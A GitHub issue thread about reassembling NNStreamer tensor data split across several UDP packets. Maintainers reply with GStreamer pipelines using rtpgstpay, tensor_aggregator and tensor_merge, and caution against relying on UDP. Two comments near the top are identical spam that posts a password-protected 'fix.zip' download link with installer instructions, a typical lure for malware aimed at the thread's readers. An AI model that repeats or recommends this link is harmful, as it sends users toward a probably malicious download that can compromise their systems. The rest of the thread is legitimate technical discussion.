### ISSUE TITLE
Is it possible to accumulate multiple UDP packets and feed as one tensor to tensor_filter?

### ISSUE THREAD

**Issue by liuhao-97** [nnstreamer/nnstreamer#4554]
I am trying to use tensor data from UDP packet as input of tensor filter. Both the sender and receiver are using on NNstreamer.

When I send tensor data less than 65536 bytes(max UDP packet size), the sender can send the tensor within one UDP packet and the receiver can successfully process it with tensor filter. 

But when the sender tries to send tensor data larger than 65536 bytes, it have to use rtpgstpay and split the tensor into mulitple UDP packets. The receiver cannot extract the tensor data from each UDP packet and feed them as a whole into tensor filter . 

May I ask what should I do to correct it? Thanks!

## When the tensor data is less than 65536 bytes. (one UDP packet)
The sender executes 
```
str_pipeline = 'filesrc location=rgb.jpg ! jpegdec ! videoconvert ! videoscale ! video/x-raw, format=GRAY8, width=32, height=256 !  tensor_converter ! tensor_sink name=tensor_sink'
...
str_pipeline = 'appsrc name=player_src ! udpsink host=10.x.x.x port=6000'
```
and the receiver executes where tensor filter is running
`gst-launch-1.0 udpsrc port=6000 ! other/tensors,format=static,framerate=0/1,num_tensors=1,dimensions=512:2:2:1, type=float32 ! tensor_transform mode=transpose option=1:2:0:3 ! tensor_filter framework=pytorch model=dnn_model.torchscript.pt input=2:2:512:1 inputtype=float32 inputname=input output=2:2:8:1 outputtype=float32 accelerator=true:gpu ! udpsink host=10.68.186.155 port=6001`

## When the tensor data is larger than 65536 bytes. (multiple UDP packets)
The sender executes 
```
str_pipeline = 'filesrc location=rgb.jpg ! jpegdec ! videoconvert ! videoscale ! video/x-raw, format=GRAY8, width=32, height=256 !  tensor_converter ! tensor_sink name=tensor_sink'
...
str_pipeline = 'appsrc name=player_src ! rtpgstpay ! udpsink host=10.x.x.x port=6000'
```
and the receiver executes  (there is  issue with that)
`gst-launch-1.0 udpsrc port=6000 !  rtpgstdepay ! other/tensors,format=static,framerate=0/1,num_tensors=1,dimensions=512:2:2:1, type=float32 ! tensor_transform mode=transpose option=1:2:0:3 ! tensor_filter framework=pytorch model=dnn_model.torchscript.pt input=2:2:512:1 inputtype=float32 inputname=input output=2:2:8:1 outputtype=float32 accelerator=true:gpu ! udpsink host=10.68.186.155 port=6001`

**Comment by sunshinezxq** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by luozhengdong** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by gichan-jang** [comment]
Hello, @liuhao-97.
Please try to send the serialized tensor data.
I attached simple pipeline description for test.
```
# Receiver (Run first)
$ gst-launch-1.0 -e -v udpsrc port=5001 !  application/x-rtp ! rtpgstdepay ! other/flatbuf-tensor ! tensor_converter ! tensor_decoder mode=direct_video ! videoconvert !  videoscale ! autovideosink
# Sender
$ gst-launch-1.0 videotestsrc  ! videoconvert ! videoscale ! video/x-raw, width=320, height=240, framerate=30/1, format=GRAY8 ! tensor_converter ! tensor_decoder mode=flatbuf ! rtpgstpay ! udpsink host=10.x.x.x port=5001
```


FYI, additional pipeline  description to transmit jpeg video stream.
```
# Receiver
$ gst-launch-1.0 -v udpsrc port=5001 ! application/x-rtp ! rtpgstdepay ! image/jpeg,width=1280, height=720,framerate=30/1  ! jpegdec !  videoconvert ! autovideosink
# Sender
$ gst-launch-1.0 v4l2src  ! image/jpeg,width=1280, height=720,framerate=30/1 ! rtpgstpay ! udpsink  host=10.x.x.x port=5001
```

**Comment by myungjoo** [comment]
You can use tensor_aggregator to aggregate multiple tensors with different timestamp from a single stream.

Anyway, if you are sending a media stream over UDP, I recommend to demux and decode after the packet is received, not before the packet is sent. Then, you will be able to use the various media-transmission mechanisms of gstreamer.

**Comment by liuhao-97** [comment]
@myungjoo @gichan-jang Thank you for your response.

I am building a prototype system for split computing, which is to split DNN into multiple segements and execute on different devices. That is why I need to send feature map tensors from one device to the other. And a lot of feature map tensors are larger than 65536 bytes (such as for float32 224*224*3,  224*224*3*4=602112 byte)

tensor_aggregator can aggregate the same size tensors from different frames in four dimensions, but what if the tensor data from sender is not evenly distributed into multiple UDP packets? 
For example, when the sender sends one single tensor with the size 70000 bytes by the following command, the original tensor will be participate into multiple UDP packets with different size as the figure shows. Is there a way to assemeble the data from these UDP packets as one single tensor and feed into tensor filter?

Thanks!

```
str_pipeline = 'filesrc location=rgb.jpg ! jpegdec ! videoconvert ! videoscale ! video/x-raw, format=GRAY8, width=100, height=700 !  tensor_converter ! tensor_sink name=tensor_sink'
...
str_pipeline = 'appsrc name=player_src ! rtpgstpay ! udpsink host=10.x.x.x port=6000'
```
![image](https://github.com/user-attachments/assets/cff36fb9-9174-4cfb-bdd3-d182382ce8da)

**Comment by gichan-jang** [comment]
Not `type=` but `types=`
```
gst-launch-1.0 udpsrc port=6001 ! \
 other/tensors,format=static,framerate=0/1,num_tensors=1,dimensions=3:10:10:1, types=uint8 ! \
tensor_aggregator frames-in=1 frames-out=2 frames-flush=2 frames-dim=3 ! \
tensor_sink name=tensor_sink
```

**Comment by liuhao-97** [comment]
Thank you for your help!
May I ask what is the different between tensor_merge and tensor_aggregator?

**Comment by gichan-jang** [comment]
Does the pipeline above work well?

And for tensor_aggregator and tensor_merge,
There is a well-explained document about tensor aggregators. Refer to this [document](https://nnstreamer.github.io/gst/nnstreamer/elements/gsttensor_aggregator.html).


Tensor merge is an element that merges multiple tensors into one.
e.g.) merge 3:640:480 & 3:640:480 to 3:1280:480, option=1 (index of the rank)
e.g.) merge 3:4:4 & 3:4:4 to 3:4:8, option=2

**Comment by liuhao-97** [comment]
Thanks! It works well. 

Is there any element which can accumulate **different size tensors** **from different sources** (like compositor), as tensor_aggregator can only handle static tensor? 
Like tensor_compositor?
https://github.com/nnstreamer/nnstreamer/pull/4298

For example, when the system have two 2:10:10:1 tensors and three 1:10:10:1 tensors as input, it will form a larger tensor with size 7:10:10:1 and feed into the tensor_filter.

The pipeline might look like this figure.
![image](https://github.com/user-attachments/assets/3ba62fe2-f100-4abf-bcc5-e40720bd9353)

I have tried the following pipeline but it gives me the following error. compositor can't accept other/tensors.
WARNING: erroneous pipeline: could not link tensoraggregator0 to comp
```
gst-launch-1.0 udpsrc port=6000 ! other/tensors,format=static,framerate=0/1,num_tensors=1,dimensions=2:10:10:1, types=uint8 ! tensor_aggregator frames-in=1 frames-out=2 frames-flush=2 frames-dim=0 ! \
compositor name=comp ! tensor_sink \
udpsrc port=6001 ! other/tensors,format=static,framerate=0/1,num_tensors=1,dimensions=1:10:10:1, types=uint8 ! tensor_aggregator frames-in=1 frames-out=3 frames-flush=3 frames-dim=0 ! comp.
```

Or the pipeline may looks like this?
![image](https://github.com/user-attachments/assets/bd3c1973-688b-47bb-8028-73e3a39270a5)

May I ask do you have any suggestion about this? 
Thanks!

**Comment by liuhao-97** [comment]
I think the main issue is that tensor_merge and tensor_aggregator can only accept static tensor sinkpad. Seems tensor_mux can handle flexible tensor sinkpad.

**Comment by gichan-jang** [comment]
Please use `tensor_merge`.
I think, this pipeline will help you.
3:10:10 + 4:10:10 -> 7:10:10
```
gst-launch-1.0 tensor_merge name=merge mode=linear option=0 ! tensor_sink  \
    videotestsrc  ! videoconvert ! videoscale ! video/x-raw, width=10, height=10, framerate=30/1,format=RGB ! \
        tensor_converter ! merge.sink_0 \
    videotestsrc  ! videoconvert ! videoscale ! video/x-raw, width=10, height=10, framerate=30/1,format=RGBA !  \
        tensor_converter ! merge.sink_1
```

**Comment by liuhao-97** [comment]
@gichan-jang  Thank you so much! I think it works.

I put the pipeline here in case someone might need it.

```
gst-launch-1.0 tensor_merge name=merge mode=linear option=0 ! tensor_sink  \
    filesrc location=rgb.jpg ! jpegdec ! videoconvert ! videoscale ! video/x-raw, width=10, height=10,format=RGB ! tensor_converter ! merge.sink_0 \
    filesrc location=rgb.jpg ! jpegdec ! videoconvert ! videoscale ! video/x-raw, width=10, height=10,format=RGBA ! tensor_converter ! merge.sink_1
```


```
gst-launch-1.0 tensor_merge name=merge mode=linear option=2 ! tensor_sink  \
    udpsrc port=6000 ! other/tensors,format=static,framerate=0/1,num_tensors=1,dimensions=2:10:10:1, types=uint8 ! tensor_transform mode=transpose option=1:2:0:3 ! tensor_aggregator frames-in=1 frames-out=2 frames-flush=2 frames-dim=2 ! other/tensor,num_tensors=1,dimensions=10:10:4,types=uint8 ! merge.sink_0 \
    udpsrc port=6001 ! other/tensors,format=static,framerate=0/1,num_tensors=1,dimensions=1:10:10:1, types=uint8 ! tensor_transform mode=transpose option=1:2:0:3 ! tensor_aggregator frames-in=1 frames-out=3 frames-flush=3 frames-dim=2 ! other/tensor,num_tensors=1,dimensions=10:10:3,types=uint8 ! merge.sink_1 \
```

**Comment by myungjoo** [comment]
Anyway, as in the comments of https://github.com/nnstreamer/nnstreamer/issues/4569 , 
as long as you use UDP, you CANNOT guarantee the order of incoming packets.

Plus, depending on the packet size limit of UDP for data transmission splitting is an ill design.
Use another layer that addresses your needs. Reuse what's already there. Don't reinvent the wheel.

The current approach of yours is going sideway. (you are reinventing the wheel!)
